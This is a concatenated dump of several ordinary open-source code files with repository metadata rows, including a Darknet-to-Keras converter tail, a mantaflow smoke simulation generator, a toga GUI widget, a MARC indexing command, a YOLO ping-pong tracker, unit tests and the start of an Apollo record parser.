prev_layer = ZeroPadding2D(((1,0),(1,0)))(prev_layer)
conv_layer = (Conv2D(
filters, (size, size),
strides=(stride, stride),
kernel_regularizer=l2(weight_decay),
use_bias=not batch_normalize,
weights=conv_weights,
activation=act_fn,
padding=padding))(prev_layer)
if batch_normalize:
conv_layer = (BatchNormalization(
weights=bn_weight_list))(conv_layer)
prev_layer = conv_layer
if activation == 'linear':
all_layers.append(prev_layer)
elif activation == 'leaky':
act_layer = LeakyReLU(alpha=0.1)(prev_layer)
prev_layer = act_layer
all_layers.append(act_layer)
elif section.startswith('route'):
ids = [int(i) for i in cfg_parser[section]['layers'].split(',')]
layers = [all_layers[i] for i in ids]
if len(layers) > 1:
print('Concatenating route layers:', layers)
concatenate_layer = Concatenate()(layers)
all_layers.append(concatenate_layer)
prev_layer = concatenate_layer
else:
skip_layer = layers[0] # only one layer to route
all_layers.append(skip_layer)
prev_layer = skip_layer
elif section.startswith('maxpool'):
size = int(cfg_parser[section]['size'])
stride = int(cfg_parser[section]['stride'])
all_layers.append(
MaxPooling2D(
pool_size=(size, size),
strides=(stride, stride),
padding='same')(prev_layer))
prev_layer = all_layers[-1]
elif section.startswith('shortcut'):
index = int(cfg_parser[section]['from'])
activation = cfg_parser[section]['activation']
assert activation == 'linear', 'Only linear activation supported.'
all_layers.append(Add()([all_layers[index], prev_layer]))
prev_layer = all_layers[-1]
elif section.startswith('upsample'):
stride = int(cfg_parser[section]['stride'])
assert stride == 2, 'Only stride=2 supported.'
all_layers.append(UpSampling2D(stride)(prev_layer))
prev_layer = all_layers[-1]
elif section.startswith('yolo'):
out_index.append(len(all_layers)-1)
all_layers.append(None)
prev_layer = all_layers[-1]
elif section.startswith('net'):
pass
else:
raise ValueError(
'Unsupported section header type: {}'.format(section))
# Create and save model.
if len(out_index)==0: out_index.append(len(all_layers)-1)
model = Model(inputs=input_layer, outputs=[all_layers[i] for i in out_index])
print(model.summary())
if args.weights_only:
model.save_weights('{}'.format(output_path))
print('Saved Keras weights to {}'.format(output_path))
else:
model.save('{}'.format(output_path))
print('Saved Keras model to {}'.format(output_path))
# Check to see if all weights have been read.
remaining_weights = len(weights_file.read()) / 4
weights_file.close()
print('Read {} of {} from Darknet weights.'.format(count, count +
remaining_weights))
if remaining_weights > 0:
print('Warning: {} unused weights'.format(remaining_weights))
if args.plot_model:
plot(model, to_file='{}.png'.format(output_root), show_shapes=True)
print('Saved model plot to {}.png'.format(output_root))
if __name__ == '__main__':
_main(parser.parse_args())
| 38.821293 | 114 | 0.596082 |
70a0a25b5c28ff109eba89e22cdb59d9b9f82263 | 9,111 | py | Python | tensorflow/example1_smoke_tiled/manta_genSimData.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 158 | 2018-06-24T17:42:13.000Z | 2022-03-12T13:29:43.000Z | tensorflow/example1_smoke_tiled/manta_genSimData.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 5 | 2018-09-05T07:30:48.000Z | 2020-07-01T08:56:28.000Z | tensorflow/example1_smoke_tiled/manta_genSimData.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 35 | 2018-06-13T04:05:42.000Z | 2022-03-29T16:55:24.000Z | #******************************************************************************
#
# Double sim data generation
# (note, no blur when transferring hi->lo at the moment)
#
#******************************************************************************
from manta import *
import os, shutil, math, sys, time
import numpy as np
sys.path.append("../tools")
import paramhelpers as ph
# Main params ----------------------------------------------------------------------#
steps = 200
savedata = True
saveppm = False
simNo = 1000 # start ID
showGui = 0
basePath = '../data/'
npSeedstr = "-1"
res = 64
# debugging
#steps = 50 # shorter test
#savedata = False # debug , dont write...
#showGui = 1
basePath = ph.getParam( "basePath", basePath )
npSeedstr = ph.getParam( "npSeed" , npSeedstr )
simNo = int(ph.getParam( "simNo" , simNo ))
res = int(ph.getParam( "res" , res ))
steps = int(ph.getParam( "steps" , steps ))
npSeed = int(npSeedstr)
ph.checkUnusedParams()
# Scene settings ---------------------------------------------------------------------#
setDebugLevel(1)
# Solver params ----------------------------------------------------------------------#
dim = 2
offset = 20
interval = 1
scaleFactor = 4
sm_gs = vec3(res,res,res)
xl_gs = sm_gs * float(scaleFactor)
if (dim==2): xl_gs.z = sm_gs.z = 1 # 2D
#buoy = vec3(0,-9e-4,0)
buoy = vec3(0,-1e-3,0)
xl_buoy = buoy * vec3(1./scaleFactor)
velOffset = vec3(0.)
xl_velOffset = vec3(0.)
# wlt Turbulence input fluid
sm = Solver(name='smaller', gridSize = sm_gs, dim=dim)
sm.timestep = 0.5
# wlt Turbulence output fluid
xl = Solver(name='larger', gridSize = xl_gs, dim=dim)
xl.timestep = sm.timestep
# Simulation Grids -------------------------------------------------------------------#
flags = sm.create(FlagGrid)
vel = sm.create(MACGrid)
velTmp = sm.create(MACGrid)
density = sm.create(RealGrid)
pressure = sm.create(RealGrid)
xl_flags = xl.create(FlagGrid)
xl_vel = xl.create(MACGrid)
xl_velTmp = xl.create(MACGrid)
xl_blurvel = xl.create(MACGrid)
xl_density = xl.create(RealGrid)
xl_blurden = xl.create(RealGrid)
xl_pressure= xl.create(RealGrid)
# open boundaries
bWidth=1
flags.initDomain(boundaryWidth=bWidth)
flags.fillGrid()
xl_flags.initDomain(boundaryWidth=bWidth)
xl_flags.fillGrid()
setOpenBound(flags, bWidth,'yY',FlagOutflow|FlagEmpty)
setOpenBound(xl_flags, bWidth,'yY',FlagOutflow|FlagEmpty)
# inflow sources ----------------------------------------------------------------------#
if(npSeed>0): np.random.seed(npSeed)
# init random density
noise = []
sources = []
noiseN = 12
nseeds = np.random.randint(10000,size=noiseN)
cpos = vec3(0.5,0.5,0.5)
randoms = np.random.rand(noiseN, 8)
for nI in range(noiseN):
noise.append( sm.create(NoiseField, fixedSeed= int(nseeds[nI]), loadFromFile=True) )
noise[nI].posScale = vec3( res * 0.1 * (randoms[nI][7] + 1) )
noise[nI].clamp = True
noise[nI].clampNeg = 0
noise[nI].clampPos = 1.0
noise[nI].valScale = 1.0
noise[nI].valOffset = -0.01 # some gap
noise[nI].timeAnim = 0.3
noise[nI].posOffset = vec3(1.5)
# random offsets
coff = vec3(0.4) * (vec3( randoms[nI][0], randoms[nI][1], randoms[nI][2] ) - vec3(0.5))
radius_rand = 0.035 + 0.035 * randoms[nI][3]
upz = vec3(0.95)+ vec3(0.1) * vec3( randoms[nI][4], randoms[nI][5], randoms[nI][6] )
if(dim == 2):
coff.z = 0.0
upz.z = 1.0
if( nI%2 == 0 ):
sources.append(xl.create(Cylinder, center=xl_gs*(cpos+coff), radius=xl_gs.x*radius_rand, \
z=xl_gs*radius_rand*upz))
else:
sources.append(xl.create(Sphere, center=xl_gs*(cpos+coff), radius=xl_gs.x*radius_rand, scale=upz))
print (nI, "centre", xl_gs*(cpos+coff), "radius", xl_gs.x*radius_rand, "other", upz )
densityInflow( flags=xl_flags, density=xl_density, noise=noise[nI], shape=sources[nI], scale=1.0, sigma=1.0 )
# init random velocity
Vrandom = np.random.rand(3)
v1pos = vec3(0.7 + 0.4 *(Vrandom[0] - 0.5) ) #range(0.5,0.9)
v2pos = vec3(0.3 + 0.4 *(Vrandom[1] - 0.5) ) #range(0.1,0.5)
vtheta = Vrandom[2] * math.pi * 0.5
velInflow = 0.04 * vec3(math.sin(vtheta), math.cos(vtheta), 0)
if(dim == 2):
v1pos.z = v2pos.z = 0.5
xl_sourcV1 = xl.create(Sphere, center=xl_gs*v1pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV2 = xl.create(Sphere, center=xl_gs*v2pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV1.applyToGrid( grid=xl_vel , value=(-velInflow*float(xl_gs.x)) )
xl_sourcV2.applyToGrid( grid=xl_vel , value=( velInflow*float(xl_gs.x)) )
elif(dim == 3):
VrandomMore = np.random.rand(3)
vtheta2 = VrandomMore[0] * math.pi * 0.5
vtheta3 = VrandomMore[1] * math.pi * 0.5
vtheta4 = VrandomMore[2] * math.pi * 0.5
for dz in range(1,10,1):
v1pos.z = v2pos.z = (0.1*dz)
vtheta_xy = vtheta *(1.0 - 0.1*dz ) + vtheta2 * (0.1*dz)
vtheta_z = vtheta3 *(1.0 - 0.1*dz ) + vtheta4 * (0.1*dz)
velInflow = 0.04 * vec3( math.cos(vtheta_z) * math.sin(vtheta_xy), math.cos(vtheta_z) * math.cos(vtheta_xy), math.sin(vtheta_z))
xl_sourcV1 = xl.create(Sphere, center=xl_gs*v1pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV2 = xl.create(Sphere, center=xl_gs*v2pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV1.applyToGrid( grid=xl_vel , value=(-velInflow*float(xl_gs.x)) )
xl_sourcV2.applyToGrid( grid=xl_vel , value=( velInflow*float(xl_gs.x)) )
blurSig = float(scaleFactor) / 3.544908 # 3.544908 = 2 * sqrt( PI )
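# With scaleFactor = 4 this gives blurSig ~= 4 / 3.544908 ~= 1.128, i.e. the
# Gaussian sigma used for the (currently optional/disabled) high-to-low blur
# grows linearly with the resolution ratio between the two solvers.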
xl_blurden.copyFrom( xl_density )
# todo blurRealGrid( xl_density, xl_blurden, blurSig)
interpolateGrid( target=density, source=xl_blurden )
xl_blurvel.copyFrom( xl_vel )
# todo blurMacGrid( xl_vel, xl_blurvel, blurSig)
interpolateMACGrid( target=vel, source=xl_blurvel )
vel.multConst( vec3(1./scaleFactor) )
printBuildInfo()
# Setup UI ---------------------------------------------------------------------#
if (showGui and GUI):
gui=Gui()
gui.show()
gui.pause()
if savedata:
simPath, simNo = ph.getNextSimPath(simNo, basePath)
sys.stdout = ph.Logger(simPath)
t = 0
resetN = 20
# main loop --------------------------------------------------------------------#
while t < steps+offset:
curt = t * sm.timestep
mantaMsg( "Current time t: " + str(curt) +" \n" )
newCentre = calcCenterOfMass(xl_density)
xl_velOffset = xl_gs*float(0.5) - newCentre
xl_velOffset = xl_velOffset * (1./ xl.timestep)
velOffset = xl_velOffset * (1./ float(scaleFactor))
#velOffset = xl_velOffset = vec3(0.0) # re-centering off
if(dim == 2):
xl_velOffset.z = velOffset.z = 0.0
# high res fluid
advectSemiLagrange(flags=xl_flags, vel=xl_velTmp, grid=xl_vel, order=2, openBounds=True, boundaryWidth=bWidth)
setWallBcs(flags=xl_flags, vel=xl_vel)
addBuoyancy(density=xl_density, vel=xl_vel, gravity=buoy , flags=xl_flags)
if 1 and ( t< offset ):
vorticityConfinement( vel=xl_vel, flags=xl_flags, strength=0.05 )
solvePressure(flags=xl_flags, vel=xl_vel, pressure=xl_pressure , cgMaxIterFac=10.0, cgAccuracy=0.0001 )
setWallBcs(flags=xl_flags, vel=xl_vel)
xl_velTmp.copyFrom( xl_vel )
xl_velTmp.addConst( xl_velOffset )
if( dim == 2 ):
xl_vel.multConst( vec3(1.0,1.0,0.0) )
xl_velTmp.multConst( vec3(1.0,1.0,0.0) )
advectSemiLagrange(flags=xl_flags, vel=xl_velTmp, grid=xl_density, order=2, openBounds=True, boundaryWidth=bWidth)
xl_density.clamp(0.0, 2.0)
# low res fluid, velocity
if( t % resetN == 0) :
xl_blurvel.copyFrom( xl_vel )
# optional blurMacGrid( xl_vel, xl_blurvel, blurSig)
interpolateMACGrid( target=vel, source=xl_blurvel )
vel.multConst( vec3(1./scaleFactor) )
else:
advectSemiLagrange(flags=flags, vel=velTmp, grid=vel, order=2, openBounds=True, boundaryWidth=bWidth)
setWallBcs(flags=flags, vel=vel)
addBuoyancy(density=density, vel=vel, gravity=xl_buoy , flags=flags)
if 1 and ( t< offset ):
vorticityConfinement( vel=vel, flags=flags, strength=0.05/scaleFactor )
solvePressure(flags=flags, vel=vel, pressure=pressure , cgMaxIterFac=10.0, cgAccuracy=0.0001 )
setWallBcs(flags=flags, vel=vel)
velTmp.copyFrom(vel)
velTmp.addConst( velOffset )
# low res fluid, density
if( t % resetN == 0) :
xl_blurden.copyFrom( xl_density )
# optional blurRealGrid( xl_density, xl_blurden, blurSig)
interpolateGrid( target=density, source=xl_blurden )
else:
advectSemiLagrange(flags=flags, vel=velTmp, grid=density, order=2, openBounds=True, boundaryWidth=bWidth)
density.clamp(0.0, 2.0)
# save low and high res
# save all frames
if savedata and t>=offset and (t-offset)%interval==0:
tf = (t-offset)/interval
framePath = simPath + 'frame_%04d/' % tf
os.makedirs(framePath)
density.save(framePath + 'density_low_%04d_%04d.uni' % (simNo, tf))
vel.save(framePath + 'vel_low_%04d_%04d.uni' % (simNo, tf))
xl_density.save(framePath + 'density_high_%04d_%04d.uni' % (simNo, tf))
if(saveppm):
projectPpmFull( xl_density, simPath + 'density_high_%04d_%04d.ppm' % (simNo, tf), 0, 1.0 )
projectPpmFull( density, simPath + 'density_low_%04d_%04d.ppm' % (simNo, tf), 0, 1.0 )
sm.step()
#gui.screenshot( 'outLibt1_%04d.png' % t )
xl.step()
t = t+1
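# Note on the coupling in the loop above: the high-resolution solve (xl_*) always advances;
# every resetN steps the low-resolution density and velocity are re-initialised by (optionally
# blurred) downsampling from the high-resolution grids, and on the other steps they evolve
# through their own low-resolution advection, buoyancy and pressure solve.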
| 35.177606 | 131 | 0.636922 |
5f8cf6b5a7d4aaf3580dd8849bfb22930268fb95 | 6,128 | py | Python | src/eddington_gui/boxes/data_columns_box.py | saroad2/eddington-gui | c5bbf7686c1964ca179e52348db324eeded1ee65 | [
"Apache-2.0"
] | 6 | 2020-09-26T18:31:06.000Z | 2022-02-14T14:15:02.000Z | src/eddington_gui/boxes/data_columns_box.py | saroad2/eddington-gui | c5bbf7686c1964ca179e52348db324eeded1ee65 | [
"Apache-2.0"
] | 44 | 2020-08-07T11:50:27.000Z | 2022-02-26T16:00:03.000Z | src/eddington_gui/boxes/data_columns_box.py | saroad2/eddington-gui | c5bbf7686c1964ca179e52348db324eeded1ee65 | [
"Apache-2.0"
] | 5 | 2020-08-10T09:41:04.000Z | 2020-10-17T10:51:23.000Z | """Box for choosing which columns to use in data dictionary."""
from typing import Callable, List, Optional
import toga
from eddington import FittingData
from toga.style import Pack
from toga.style.pack import LEFT
from eddington_gui.boxes.line_box import LineBox
from eddington_gui.util import value_or_none
class DataColumnsBox(LineBox): # pylint: disable=too-many-instance-attributes
"""Visual box instance for choosing columns."""
__items: List[str] = []
__selection_enabled: bool = False
x_selection: toga.Selection
xerr_selection: toga.Selection
y_selection: toga.Selection
yerr_selection: toga.Selection
__fitting_data: Optional[FittingData]
__on_columns_change: Optional[Callable[[FittingData], None]]
__handlers: List[Callable]
def __init__(self, on_columns_change):
"""Initialize box."""
super().__init__()
self.__fitting_data = None
self.__handlers = []
self.on_columns_change = None
self.x_selection = self.__add_column_option(
label="X column:", on_select=lambda widget: self.set_columns()
)
self.xerr_selection = self.__add_column_option(
label="X error column:", on_select=lambda widget: self.set_columns()
)
self.y_selection = self.__add_column_option(
label="Y column:", on_select=lambda widget: self.set_columns()
)
self.yerr_selection = self.__add_column_option(
label="Y error column:", on_select=lambda widget: self.set_columns()
)
self.on_columns_change = on_columns_change
@property
def fitting_data(self):
"""Fit data getter."""
return self.__fitting_data
@fitting_data.setter
def fitting_data(self, fitting_data: FittingData):
"""
Fit data setter.
If fit data is None, reset all selections
"""
self.__fitting_data = fitting_data
if fitting_data is None:
self.clear_selections()
return
items = list(fitting_data.data.keys())
used_columns = self.fitting_data.used_columns
self.set_items(self.x_selection, items, used_columns.x)
self.set_items(self.xerr_selection, items, used_columns.xerr)
self.set_items(self.y_selection, items, used_columns.y)
self.set_items(self.yerr_selection, items, used_columns.yerr)
self.selection_enabled = True
self.set_columns()
@property
def on_columns_change(self) -> Optional[Callable]:
"""on_columns_change getter."""
return self.__on_columns_change
@on_columns_change.setter
def on_columns_change(self, on_columns_change):
"""on_columns_change setter."""
self.__on_columns_change = on_columns_change
@property
def x_column(self):
"""X column name value."""
return value_or_none(self.x_selection.value)
@property
def xerr_column(self):
"""X error column name value."""
return value_or_none(self.xerr_selection.value)
@property
def y_column(self):
"""Y column name value."""
return value_or_none(self.y_selection.value)
@property
def yerr_column(self):
"""Y error column name value."""
return value_or_none(self.yerr_selection.value)
@property
def selection_enabled(self):
"""Boolean. is selection enabled for columns."""
return self.__selection_enabled
@selection_enabled.setter
def selection_enabled(self, selection_enabled):
"""Set selection enabled for all column selection widgets."""
self.__selection_enabled = selection_enabled
self.x_selection.enabled = selection_enabled
self.xerr_selection.enabled = selection_enabled
self.y_selection.enabled = selection_enabled
self.yerr_selection.enabled = selection_enabled
@staticmethod
def set_items(selection, items, value):
"""
Set items and value in selection widget.
:param selection: Selection widget
:param items: list of options for the widget
:param value: selected value
"""
selection.items = items
if value is not None:
selection.value = value
def clear_selections(self):
"""Clear all selections."""
self.selection_enabled = False
self.set_items(self.x_selection, [], None)
self.set_items(self.xerr_selection, [], None)
self.set_items(self.y_selection, [], None)
self.set_items(self.yerr_selection, [], None)
self.run_on_columns_change()
def set_columns(self): # pylint: disable=unused-argument
"""Set columns of the fit data based on the selection of the user."""
if not self.selection_enabled:
return
self.fitting_data.x_column = self.x_selection.value
self.fitting_data.xerr_column = self.xerr_selection.value
self.fitting_data.y_column = self.y_selection.value
self.fitting_data.yerr_column = self.yerr_selection.value
self.run_on_columns_change()
def run_on_columns_change(self):
"""If on_columns_change is not None, runs it."""
if self.on_columns_change is not None:
self.on_columns_change(self.fitting_data) # pylint: disable=not-callable
def read_csv(self, filepath):
"""
Read data from csv file.
:param filepath: path of the csv file
"""
self.fitting_data = FittingData.read_from_csv(filepath)
def read_excel(self, filepath, sheet):
"""
Read data from excel file.
:param filepath: path of the excel file
:param sheet: sheet from which to read the data.
"""
self.fitting_data = FittingData.read_from_excel(filepath, sheet)
def __add_column_option(self, label, on_select):
self.add(toga.Label(text=label))
selection = toga.Selection(
enabled=self.selection_enabled,
on_select=on_select,
style=Pack(alignment=LEFT),
)
self.add(selection)
return selection
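
# Illustrative usage sketch (assumes a running toga app context; not part of the original module):
#
#   box = DataColumnsBox(on_columns_change=lambda data: print(data))
#   box.read_csv("/path/to/data.csv")   # loads a FittingData and populates the column selections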
| 33.67033 | 85 | 0.662369 |
23c69e7cf1ad34fbf43d12844419032bfa4856b7 | 1,345 | py | Python | aristotle/management/commands/load_authorities.py | jermnelson/aristotle-library-apps | f742847cd20c5b5c3b46dd53dfc395a2e1caa240 | [
"Apache-2.0"
] | 2 | 2015-03-30T16:36:51.000Z | 2016-06-15T01:39:47.000Z | aristotle/management/commands/load_authorities.py | jermnelson/aristotle-library-apps | f742847cd20c5b5c3b46dd53dfc395a2e1caa240 | [
"Apache-2.0"
] | 2 | 2021-06-10T17:43:54.000Z | 2021-12-13T19:40:08.000Z | aristotle/management/commands/load_authorities.py | jermnelson/aristotle-library-apps | f742847cd20c5b5c3b46dd53dfc395a2e1caa240 | [
"Apache-2.0"
] | 1 | 2015-11-08T00:40:11.000Z | 2015-11-08T00:40:11.000Z | """Management commands loads title, Person, and Subject authorities into
the Redis Library Services Platform"""
__author__ = "Jeremy Nelson"
import datetime
import os
import sys

import pymarc
from aristotle.settings import REDIS_DATASTORE, PROJECT_HOME
from django.core.management.base import BaseCommand, CommandError
def __index_titles__(**kwargs):
redis_ds = kwargs.get('redis_datastore',
REDIS_DATASTORE)
filename = kwargs.get('filename', None)
if filename is None:
return
    title_authorities = pymarc.MARCReader(
        open(filename, 'rb'),
        to_unicode=True)
start_time = datetime.datetime.utcnow()
print("Started title indexing at {0}".format(start_time.isoformat()))
for i, rec in enumerate(title_authorities):
        index_marc(record=rec,
                   redis_datastore=redis_ds)
if not i%100:
sys.stderr.write(".")
if not i%1000:
print(i)
end_time = datetime.datetime.utcnow()
print("End title indexing at {0}, total-time={1}".format(
end_time.isoformat(),
end_time-start_time))
class Command(BaseCommand):
args = ''
help = "Indexes Title, Person, and Subject into RLSP and Whoosh indicies"
def handle(self, *args, **options):
__index_titles__(**options)
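
# Assumed invocation (standard Django management command; command options are forwarded to the indexer):
#   python manage.py load_authorities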
| 30.568182 | 77 | 0.649814 |
30b36cda93d35d15abd9fd441aa18c020b511148 | 5,300 | py | Python | client/darknet_video.py | akauble/cv-pong | eaa36222583caa7fcb4d8557ea1c9e28b92d6cec | [
"MIT"
] | null | null | null | client/darknet_video.py | akauble/cv-pong | eaa36222583caa7fcb4d8557ea1c9e28b92d6cec | [
"MIT"
] | null | null | null | client/darknet_video.py | akauble/cv-pong | eaa36222583caa7fcb4d8557ea1c9e28b92d6cec | [
"MIT"
] | null | null | null | from ctypes import *
from util import *
from GameState import *
import math
import random
import os
import cv2
import numpy as np
import time
import darknet
import argparse
def cvDrawBoxes(bestpt1, bestpt2, img):
cv2.rectangle(img, bestpt1, bestpt2, (0, 255, 0), 1)
return img
netMain = None
metaMain = None
altNames = None
player1Name = ""
player2Name = ""
maxScore = 11
tableBoundariesSet= []
# mouse callback function
def draw_boundary(event,x,y,flags,param):
if event == cv2.EVENT_LBUTTONDBLCLK:
if len(tableBoundariesSet) !=6:
tableBoundariesSet.append((x,y))
# print(tableBoundariesSet)
def YOLO():
    ap = argparse.ArgumentParser()
ap.add_argument("-p1", "--player1", required=True,
help="player 1 name")
ap.add_argument("-p2", "--player2", required=True,
help="player 2 name")
ap.add_argument("-s", "--score", type=float, default=11,
help="max score (11, 21)")
ap.add_argument("-sv", "--server", required=True,
help="server name")
args = vars(ap.parse_args())
p1name = args["player1"]
p2name = args["player2"]
maxScore = args["score"]
server = args["server"]
global metaMain, netMain, altNames
configPath = "yolov3-tiny.cfg"
weightPath = "420.weights"
metaPath = "obj.data"
if not os.path.exists(configPath):
raise ValueError("Invalid config path `" +
os.path.abspath(configPath)+"`")
if not os.path.exists(weightPath):
raise ValueError("Invalid weight path `" +
os.path.abspath(weightPath)+"`")
if not os.path.exists(metaPath):
raise ValueError("Invalid data file path `" +
os.path.abspath(metaPath)+"`")
if netMain is None:
netMain = darknet.load_net_custom(configPath.encode(
"ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1
if metaMain is None:
metaMain = darknet.load_meta(metaPath.encode("ascii"))
if altNames is None:
try:
with open(metaPath) as metaFH:
metaContents = metaFH.read()
import re
match = re.search("names *= *(.*)$", metaContents,
re.IGNORECASE | re.MULTILINE)
if match:
result = match.group(1)
else:
result = None
try:
if os.path.exists(result):
with open(result) as namesFH:
namesList = namesFH.read().strip().split("\n")
altNames = [x.strip() for x in namesList]
except TypeError:
pass
except Exception:
pass
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
cap.set(cv2.CAP_PROP_SETTINGS, 1)
cv2.namedWindow('Demo')
cv2.setMouseCallback('Demo',draw_boundary)
out = cv2.VideoWriter("output.avi", cv2.VideoWriter_fourcc(*"MJPG"), 10.0, (darknet.network_width(netMain), darknet.network_height(netMain)))
print("Starting the YOLO loop...")
# Create an image we reuse for each detect
darknet_image = darknet.make_image(darknet.network_width(netMain),
darknet.network_height(netMain),3)
# setup initial boundaries
ret, frame_read = cap.read()
frame_resized = cv2.resize(frame_read,
(darknet.network_width(netMain),
darknet.network_height(netMain)),
interpolation=cv2.INTER_LINEAR)
cv2.imshow('Demo', frame_resized)
while len(tableBoundariesSet) != 6:
cv2.waitKey(1)
state = GameState()
state.setMetaData(server, p1name, p2name)
while True:
prev_time = time.time()
ret, frame_read = cap.read()
frame_rgb = cv2.cvtColor(frame_read, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb,
(darknet.network_width(netMain),
darknet.network_height(netMain)),
interpolation=cv2.INTER_LINEAR)
darknet.copy_image_from_bytes(darknet_image,frame_resized.tobytes())
detections = darknet.detect_image(netMain, metaMain, darknet_image, thresh=0.75)
bestpt1, bestpt2 = detectionHandler(detections, frame_resized)
ballLocation = getCenterPoint(bestpt1[0], bestpt1[1], bestpt2[0], bestpt2[1])
image = cvDrawBoxes(bestpt1, bestpt2, frame_resized)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# if isBallOnTable(ballLocation) and col_det(ballLocation):
# state.addBounce()
# cv2.circle(image,ballLocation, 12, (0,0,255), -1)
if isBallOnTable(ballLocation):
addBallLocation(ballLocation, image)
#get ball side
tableSide = getTableSide(ballLocation)
if tableSide != "":
if state.side != tableSide:
#it changed side
didBounce = colDetection2()
if didBounce:
print("it bounced")
else:
print("no bounce detected")
resetLocations()
state.updateSide(tableSide)
scoreP1, scoreP2 = state.tick()
if state.getHighestScore() == maxScore:
state.endGame()
            break
#draw ball side
tableBoundaryHandler(image, tableBoundariesSet)
if tableSide == "left":
cv2.putText(image, tableSide, (200, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
else:
cv2.putText(image, tableSide, (375, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
        cv2.putText(image, str(p1name) + " " + str(scoreP1), (100, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
        cv2.putText(image, str(p2name) + " " + str(scoreP2), (300, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
out.write(image)
cv2.imshow('Demo', image)
if cv2.waitKey(20) & 0xFF == 27:
break
# cv2.waitKey(3)
cap.release()
out.release()
if __name__ == "__main__":
YOLO() | 29.120879 | 142 | 0.695849 |
64fdd7b34275285ced47e7072f8b134d5a3f0eae | 1,968 | py | Python | tests/prodmodel/rules/test_rules.py | prodmodel/prodmodel | 83aad9a2e3f07b182a8e90ea0d92580cb2e949fe | [
"Apache-2.0"
] | 53 | 2019-04-28T03:50:05.000Z | 2022-02-04T21:52:51.000Z | tests/prodmodel/rules/test_rules.py | prodmodel/prodmodel | 83aad9a2e3f07b182a8e90ea0d92580cb2e949fe | [
"Apache-2.0"
] | 17 | 2019-04-25T01:46:46.000Z | 2019-07-15T02:58:02.000Z | tests/prodmodel/rules/test_rules.py | prodmodel/prodmodel | 83aad9a2e3f07b182a8e90ea0d92580cb2e949fe | [
"Apache-2.0"
] | 3 | 2019-06-20T07:47:23.000Z | 2021-09-06T07:21:51.000Z | import unittest
from prodmodel.rules import rules as undertest
class TestRules(unittest.TestCase):
def test_data_stream(self):
target = undertest.data_stream(file='/home/abc/x.json', data_type='json')
self.assertEqual('JSONDataTarget', target.__class__.__name__)
def test_data_file(self):
target = undertest.data_file(file='/home/abc/x.dat')
self.assertEqual('BinaryDataTarget', target.__class__.__name__)
def _data_stream(self):
return undertest.data_stream(file='/home/abc/x.json', data_type='json')
def test_split(self):
train_x, train_y, test_x, test_y = undertest.split(data=self._data_stream(), test_ratio=0.5, target_column='x')
self.assertEqual('SelectDataTarget', train_x.__class__.__name__)
self.assertEqual('SelectDataTarget', train_y.__class__.__name__)
self.assertEqual('SelectDataTarget', test_x.__class__.__name__)
self.assertEqual('SelectDataTarget', test_y.__class__.__name__)
def test_transform_stream(self):
target = undertest.transform_stream(file='/home/abc/x.py', fn='tf', stream=self._data_stream())
self.assertEqual('TransformStreamDataTarget', target.__class__.__name__)
def test_transform(self):
target = undertest.transform(file='/home/abc/x.py', fn='tf', streams={'s': self._data_stream()})
self.assertEqual('TransformDataTarget', target.__class__.__name__)
def test_create_label_encoder(self):
target = undertest.create_label_encoder(data=self._data_stream(), columns=['x'])
self.assertEqual('LabelEncoderTarget', target.__class__.__name__)
def test_encode_labels(self):
le = undertest.create_label_encoder(data=self._data_stream(), columns=['x'])
target = undertest.encode_labels(data=self._data_stream(), label_encoder=le)
self.assertEqual('EncodeLabelDataTarget', target.__class__.__name__)
def test_test(self):
target = undertest.test(test_file='/home/abc/x.py')
self.assertEqual('TestTarget', target.__class__.__name__)
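
# The suite relies only on the standard library test runner; an assumed invocation is:
#   python -m unittest tests.prodmodel.rules.test_rules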
| 42.782609 | 115 | 0.756098 |
49d9f2646838cfb3998ada2a7ce98d0655b008ee | 4,546 | py | Python | modules/tools/record_parse_save/record_parse_save.py | GaoPenghao/apollo | c80ff99a1478b1709f434639fe29a2b2f43ad516 | [
"Apache-2.0"
] | null | null | null | modules/tools/record_parse_save/record_parse_save.py | GaoPenghao/apollo | c80ff99a1478b1709f434639fe29a2b2f43ad516 | [
"Apache-2.0"
] | null | null | null | modules/tools/record_parse_save/record_parse_save.py | GaoPenghao/apollo | c80ff99a1478b1709f434639fe29a2b2f43ad516 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""
function to parse data from *.record files, created using Apollo-Auto
current implementation illustrates sample record file parsing for
* radar (Continental ars-408)
* camera (Leopard Imaging 6mm)
* lidar (Velodyne vls-128)
* saves extracted images in separate folder using *.jpg format
* saves radar and lidar data in respective folders in *.txt format for each scan
* also saves timestamp in separate text files
"""
import os
import sys
import time
from importlib import import_module
import yaml
from cyber.python.cyber_py3 import cyber
from cyber.python.cyber_py3 import record
os.system('clear')
def read_parameters(yaml_file):
"""
function to read YAML parameter file and define output destinations
"""
with open(yaml_file, 'r') as f:
params = yaml.safe_load(f)
# record file params
RECORD_FOLDER = params['records']['filepath']
parse_type = params['parse']
# define destinations
dest_path = os.path.split(RECORD_FOLDER)
if not dest_path[-1]:
dest_path = os.path.split(dest_path[0])
